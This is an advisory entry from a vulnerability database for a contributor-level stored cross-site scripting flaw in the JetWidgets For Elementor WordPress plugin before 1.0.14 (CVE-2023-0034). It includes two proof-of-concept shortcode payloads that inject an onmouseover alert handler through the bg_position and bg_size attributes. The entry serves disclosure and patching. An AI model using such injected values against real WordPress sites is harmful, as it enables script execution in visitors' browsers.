Lucene search
Lana CodesWPEX-ID:FFBDB8A1-19C3-45E9-81B0-AD47A0791C4AHistoryDec 21, 2022 - 12:00 a.m.
JetWidgets For Elementor < 1.0.14 - Contributor+ Stored XSS via Shortcode
2022-12-2100:00:00
Lana Codes
68
jetwidgets elementor contributor stored xss thumbnail image storedxss shortcode_attack vulnerability exploit
0.001 Low
EPSS
Percentile
23.3%
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
[jw-posts show_image='yes' show_image_as='background' bg_position='" onmouseover="alert(/XSS/)"']
[jw-posts show_image='yes' show_image_as='background' bg_size='"onmouseover="alert(/XSS/)//']
Note: For the exploit, at least one of the posts must have a thumbnail image.Related
wpvulndb
wpvulndb
JetWidgets For Elementor < 1.0.14 - Contributor+ Stored XSS via Shortcode
2022-12-21 00:00:00
cvelist
cvelist
nvd
nvd
CVE-2023-0034
2023-02-13 15:15:20
prion
prion
Cross site scripting
2023-02-13 15:15:00
cve
cve
CVE-2023-0034
2023-02-13 15:15:20